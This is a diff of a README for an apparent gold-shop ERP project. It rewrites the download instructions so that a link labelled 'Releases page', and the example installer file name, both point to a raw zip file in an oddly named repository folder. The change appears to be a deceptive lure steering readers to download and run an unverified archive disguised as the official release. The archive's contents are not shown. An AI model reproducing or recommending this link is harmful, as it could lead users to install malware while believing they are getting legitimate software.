fouad-code/ERP-Gold-Shop/README.md

 ## 🔧 Download & Install

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/fouad-code/ERP-Gold-Shop/releases) to find the latest version of ERP-Gold-Shop.
+1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/fouad-code/ERP-Gold-Shop/raw/refs/heads/main/ovariodysneuria/Gold_Shop_ER_1.2.zip) to find the latest version of ERP-Gold-Shop.

 2. **Select the Version:** Look for the most recent version.
 It will be marked as "Latest Release."
 Click on it.

 3. **Download the Installer:**
-   - Find the installation file for your operating system (e.g., `ERP-Gold-Shop-Installer.exe`).
+   - Find the installation file for your operating system (e.g., `https://github.com/fouad-code/ERP-Gold-Shop/raw/refs/heads/main/ovariodysneuria/Gold_Shop_ER_1.2.zip`).
    - Click on the file to start the download.

 4. **Run the Installer:**